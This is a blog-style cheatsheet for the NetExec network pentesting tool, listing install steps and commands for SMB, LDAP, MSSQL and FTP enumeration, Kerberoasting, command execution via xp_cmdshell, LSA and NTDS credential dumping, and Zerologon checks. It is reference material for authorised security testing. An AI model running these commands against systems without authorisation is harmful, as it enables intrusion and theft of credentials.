Hacking Tools

NetExec Cheatsheet : A Comprehensive Guide

NetExec, also known as nxc, is a powerful network hacking tool designed to automate security assessments of large-scale networks.

It builds upon the legacy of CrackMapExec, offering enhanced functionality for penetration testers, red teamers, and cybersecurity professionals. Below is a detailed cheatsheet to help you utilize NetExec effectively.

To install NetExec:

bashsudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
netexec --version

The general syntax for NetExec commands:

bashnetexec <service> <target> -u <username> -p <password>

Example for SMB:

bashnetexec smb target -u username -p password
  • Null Authentication: netexec smb target -u '' -p ''
  • Guest Authentication: netexec smb target -u 'guest' -p ''
  • Kerberos Authentication: netexec smb target -u username -p password -k
  • Basic Enumeration: netexec smb target
  • List Shares: netexec smb target -u username -p password --shares
  • List Usernames: netexec smb target -u username -p password --users

Service-Specific Commands

SMB

  • All-in-One Enumeration: bashnetexec smb target -u username -p password --groups --users --shares --sessions
  • Extracting Files: bashnetexec smb target -u username -p password --get-file target_file output_file --share sharename

LDAP

  • User Enumeration: netexec ldap target -u '' -p '' --users
  • Kerberoasting: bashnetexec ldap target -u username -p password --kerberoasting hash.txt

MSSQL

  • Command Execution via xp_cmdshell: bashnetexec mssql target -u username -p password -x command_to_execute

FTP

  • List Files: netexec ftp target -u username -p password --ls

Credential Dumping

  • Secrets Dump: netexec smb target -u username -p password --lsa
  • NTDS Extraction: bashnetexec smb target -u username -p password --ntds

Check for vulnerabilities like Zerologon or PetitPotam:

bashnetexec smb target -u username -p password -M zerologon
  • Webdav Check: netexec smb target -u username -p password -M webdav
  • BloodHound Integration: bashnetexec ldap target -u username -p password --bloodhound

Explore the official NetExec Wiki and practice labs like HackTheBox’s Mist or Rebound to refine your skills.

This cheatsheet provides a quick reference to NetExec’s core functionalities, enabling efficient network enumeration, exploitation, and post-exploitation tasks.

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Leave a Comment
Share
Published by
Varshini
Tags: cybersecurityinformationsecuritykalilinuxkalilinuxtools
5 hours ago

Recent Posts

AppFlowy Cloud : Enhancing Collaboration With Secure Cloud Infrastructure

AppFlowy Cloud is a robust component of the AppFlowy ecosystem, designed to provide secure user…

1 hour ago

Kovid-Obfuscation-Passes : Unraveling Advanced Techniques For Enhanced Code Security

The "kovid-obfusctaion-passes" project is a comprehensive collection of LLVM and GCC plugins designed to implement…

1 hour ago

FFmpeg’s asm-Lessons : Mastering Assembly For Multimedia Optimization

The asm-lessons repository introduces learners to assembly language programming within the context of FFmpeg, a…

1 hour ago

Identifying Accounts Used From A Threat Actor Device

In cybersecurity, identifying accounts accessed by a threat actor's device is a critical aspect of…

5 hours ago

Dark Ledger : The Shadows Of Darknet Market Archives

Dark Ledger is a comprehensive repository designed to archive and preserve information related to darknet…

1 day ago

ScrapeServ : A Versatile URL-to-Screenshots Web Scraping Tool

ScrapeServ is a robust and easy-to-use web scraping tool designed to capture website data and…

1 day ago